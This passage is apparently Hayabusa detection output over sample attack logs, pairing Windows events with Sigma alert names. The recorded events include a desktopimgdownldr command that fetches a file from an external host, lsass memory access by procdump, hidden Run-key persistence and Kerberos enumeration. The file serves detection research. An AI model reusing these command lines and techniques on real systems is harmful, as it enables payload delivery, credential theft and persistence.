+2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | Process: C:\Windows\System32\desktopimgdownldr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z 
/eventName:desktopimgdownldr | LID: 0x89ccc | PID: 4604 | PGUID: 747F3D96-F098-5EFE-0000-001090E33801,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,C2,Suspicious Desktopimgdownldr Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Personalization\LockScreenImage\LockScreenImage_uXQ8IiHL80mkJsKc319JaA.7z | Process: C:\Windows\System32\svchost.exe | PID: 1556 | PGUID: 747F3D96-2178-5EFE-0000-0010AADA5800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Evas,Suspicious Desktopimgdownldr Target File,,../hayabusa-rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:55:49.123 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Download LockScreen Image | URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: explorer.exe /root,""c:\windows\System32\calc.exe"" | Process: C:\Windows\explorer.exe | User: ECORP\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf3072 | PID: 6860 | PGUID: 
6661D424-F4F6-5EFE-0000-0010E7EFF800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Evas,Proxy Execution Via Explorer.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,medium,Evas,Explorer Root Flag Process Tree Break,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.367 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: ECORP\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0xf3072 | PID: 3612 | PGUID: 6661D424-F4F6-5EFE-0000-0010A2F6F800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: ECORP\Administrator | Parent Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | LID: 0xf3072 | PID: 3224 | PGUID: 6661D424-F4F6-5EFE-0000-0010C00AF900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: ""C:\Windows\System32\win32calc.exe"" | Process: 
C:\Windows\System32\win32calc.exe | User: ECORP\Administrator | Parent Cmd: ""C:\Windows\System32\calc.exe"" | LID: 0xf3072 | PID: 2632 | PGUID: 6661D424-F4F6-5EFE-0000-00101D25F900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - Hidden Run value detected | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\: ""c:\windows\tasks\taskhost.exe"" | Process: C:\Users\Public\tools\evasion\a.exe | PID: 3728 | PGUID: 747F3D96-8FD2-5F00-0000-0010C15D2200",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx +2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx +2020-07-04 23:31:26.838 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Count: DWORD (0x00000001) | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx +2020-07-04 23:31:26.849 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Section1: DefaultInstall | Process: C:\Windows\regedit.exe | PID: 1452 | 
PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx +2020-07-04 23:31:26.856 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Path1: c:\programdata\gpo.inf | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx +2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 30256 | Src PGUID: 00247C92-EE6B-5F04-0000-00108C67A859 | Tgt PID: 908 | Tgt PGUID: 00247C92-DC62-5EEF-0000-001026F60100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.256 
+09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump64.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 28528 | Src PGUID: 00247C92-EE6B-5F04-0000-00109069A859 | Tgt PID: 908 | Tgt PGUID: 00247C92-DC62-5EEF-0000-001026F60100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump64.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 28528 | Src PGUID: 00247C92-EE6B-5F04-0000-00109069A859 | Tgt PID: 30096 | Tgt PGUID: 00247C92-EE6B-5F04-0000-00105C6CA859,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named 
Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ATACORE01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: PKI01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: EXCHANGE01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WEC01$ | IP Addr: ::ffff:10.23.23.9 | Status: 
0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS02$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WSUS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: DHCP01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ATANIDS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket 
Requested,User: admmig@OFFSEC.LAN | Svc: PRTG-MON$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.862 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: MSSQL01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ADFS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WEBIIS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 
+2020-07-10 05:41:04.885 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS03VULN$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 
0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket 
Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5bad,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.334 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5bf1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5c04,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User 
Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5c7f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cb1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cc8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cf4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account 
property read.evtx +2020-07-10 05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ATACORE01$ | Computer: - | IP Addr: 10.23.42.30 | LID: 0x64f5ef5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f6471,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x64f64a3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64ca,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
